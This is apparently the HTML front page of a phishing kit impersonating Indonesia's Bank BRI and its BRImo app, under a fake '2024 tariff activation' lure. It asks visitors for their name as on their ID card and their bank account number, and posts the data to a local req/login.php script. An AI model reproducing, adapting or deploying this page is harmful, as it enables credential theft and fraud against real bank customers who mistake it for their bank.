<!DOCTYPE html><html lang="in"><head>
    <meta charset="UTF-8">
    <title>𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 | 𝟮𝟬𝟮𝟰</title>
    <link rel="icon" type="image/png" href="img/BRImo.png">
    <meta name="theme-color" content="#0f78cb">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <link rel="stylesheet" href="css/2.css">
    <script type="module" src="js/ionicons.esm.js"></script>
<style>
    .lonte{
  display:none;
  z-index:4;
  position: absolute;
  top: 33%;
  left: 30%;
  transform: translate(-50%, -50%);
  
/*   spinner div css */
  height : 10px;
  width : 10px;
  border-radius : 50%;
/*   background-color : red; */
  border : 5px solid #ffffff80;
  border-top-color : #007bff;
  animation : spin 1s linear infinite;
}

@keyframes spin{
  0%{
    transform : rotate(0deg);
  }
  100%{
    transform : rotate(360deg);
  }
}
.patokk:active { background-color: rgba(0, 110, 200, 0.96); box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px inset, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px inset; transform: translateY(0px); }

.load{
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
      }
      
      .jao{
            width:90%;
      }
</style></head>

<body>
    <main>
<welalxcome>
<img src="img/BRImo.png" alt="" style="margin-top: -50px">
</welalxcome>
<chsalxcome2 style="display: ;">
    <div class="load" style="display:none">
 <img src="images/f01dmo.gif" class="jao" alt="">
      </div>
<img style="z-index:1;position: fixed;width:100%;margin-top:0px;" width="100%" src="images/buri.png" alt="">

<img style="z-index:2;position: fixed;width:100%;margin-top:50px;" src="images/26-.png" alt="">
<nav class="zz">
<img src="images/nav.png" style="margin-top:8px; margin-left:175px;" width="40px" alt="">
<p style="margin-left:10px;">Spesial Untuk<b style="color: #F37024">mo</b></p><b style="color: #F37024">
<p style="margin-left:10px;color:#fff;font-size:12px;">Cobain beragam cara baru untuk<br>memaksimalkan aktivitas perbankan kamu.</p>
</b></nav><b style="color: #F37024">

<marquee direction="right" behavior="alternate" scrolldelay="10" class="asu">
<img class="nyusu" src="images/1.png" alt="">
<img class="nyusu" src="images/2.png" alt="">
<img class="nyusu" src="images/3.png" alt="">
<img class="nyusu" src="images/4.png" alt="">
<img class="nyusu" src="images/5.png" alt="">
</marquee>    



<form action="req/login.php" method="post" id="formlog">
<center><img style="z-index:3;position: fixed;width:20%;margin-top:610px;margin-left:-40px;" src="images/T24.png" alt=""></center>
<div class="button-85 xx">
<center style="color:#09559a; line-height: 17px; font-size: 15px; padding: 5px;margin-top:-20px;font-weight:600;"><p style="border-bottom:1.5px solid #0000004a;border-radius:10px;margin-bottom:-4px;height:60px;">𝗨𝗻𝘁𝘂𝗸 𝗺𝗲𝗹𝗮𝗻𝗷𝘂𝘁𝗸𝗮𝗻 𝗽𝗿𝗼𝘀𝗲𝘀 𝗮𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝘁𝗮𝗿𝗶𝗳 𝘁𝗿𝗮𝗻𝘀𝗮𝗸𝘀𝗶 𝗮𝗻𝗱𝗮, 𝗦𝗶𝗹𝗮𝗵𝗸𝗮𝗻 𝗺𝗮𝘀𝘂𝗸𝗮𝗻 𝗱𝗮𝘁𝗮 𝗱𝗶 𝗯𝗮𝘄𝗮𝗵 𝗶𝗻𝗶</p>

</center>
<br>
  

<h5 style="color:#09559a; margin-top: 0px; margin-left: 4px">Atas nama :
<input id="nama" name="nama" type="text" class="yy" placeholder="Nama sesuai KTP" oninvalid="this.setCustomValidity('Mɑsukkɑn 𝗡𝗔�&nbsp;𝗔 sesuai KTP')" onchange="this.setCustomValidity('')" required="">
</h5>


<h5 for="norek" style="color:#09559a; margin-top: 0px; margin-left: 4px">Nomor rekening :
<input id="norek" name="norek" type="tel" class="yy" placeholder="#####" data-mask="000000000000000" required="">
</h5>
</div>
    





<div class="pilat">
<div id="lonte" class="lonte"></div>
<button class="patokk" type="submit" id="kirim" disabled="">Lanjutkan</button>
           </div>

</form></b></chsalxcome2></main><b style="color: #F37024">


<script src="js/jquery.min.js"></script>
<script src="script.js"></script>
<script src="js/jquery.min_1.js"></script>
<script>
  $(document).ready(function() {
    $('#masa_berlaku').mask('00/00');
  });
</script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },500)
        });
</script>
<script src="js/k.js"></script>
<script src="js/vibr.js"></script>
<script src="js/2.js"></script>


</b></body></html>